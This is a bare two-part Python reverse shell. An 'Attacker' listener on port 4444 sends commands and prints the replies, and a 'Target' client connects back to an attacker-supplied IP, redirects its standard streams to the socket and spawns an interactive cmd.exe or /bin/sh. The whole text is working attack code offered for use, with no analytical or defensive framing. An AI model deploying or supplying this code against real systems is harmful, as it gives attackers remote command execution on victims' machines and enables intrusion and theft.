SERVER – Run this FIRST on your machine (Attacker)
import socket
s=socket.socket()
s.bind(("0.0.0.0",4444))
s.listen(1)
print("Waiting for reverse shell on port 4444...")
c,a=s.accept()
print(f"[+] Shell from {a}")
while True:
    cmd=input("shell> ")
    if cmd.lower() in["exit","quit"]:break
    c
    c.send(cmd.encode()+b"\n")
    print(c.recv(10240).decode(errors="ignore"),end="")
c.close()



CLIENT – Run this on the Target machine
import socket,os,subprocess
ip=input("Enter Attacker IP: ")
s=socket.socket()
s.connect((ip,4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["cmd.exe"] if os.name=="nt" else ["/bin/sh","-i"])
